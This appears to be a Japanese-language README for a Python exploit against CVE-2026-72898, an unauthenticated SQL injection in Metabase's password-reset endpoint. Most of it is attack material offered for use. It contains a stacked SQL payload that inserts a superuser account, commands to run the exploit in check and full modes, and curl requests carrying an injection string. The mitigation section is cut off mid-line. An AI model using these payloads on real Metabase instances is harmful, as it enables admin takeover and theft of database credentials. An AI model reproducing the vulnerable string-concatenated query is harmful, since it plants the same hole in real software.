
CVE-2026-72898 用の Python エクスプロイト。Metabase のパスワードリセットエンドポイントにおける未認証 SQL インジェクションで、管理者アカウントを作成しデータベース認証情報を抽出します。

Metabaseの/api/session/reset_passwordエンドポイントにおける未認証SQLインジェクション。管理者アカウントを作成し、データベースの認証情報を抽出します。
影響を受けるバージョン: v58.0 - v63.3 | 修正済み: v58.24+、v59.21+、v60.17+、v61.11+、v62.9+、v63.5+
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check
SQLクエリにおける文字列連結:
# 脆弱なコード
query = f"SELECT * FROM core_user WHERE email='{email}'"
攻撃ペイロード:
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
チェックのみ (変更なし):
python3 CVE-2026-72898.py http://localhost:5000 --check
完全なエクスプロイト:
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
手動テスト:
# エンドポイントの確認
curl http://localhost:5000/api/health
# SQLiのテスト
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
今すぐ:
/api/session/reset_passwordをブロック後で:
許可された使用のみ。不正アクセスは違法です。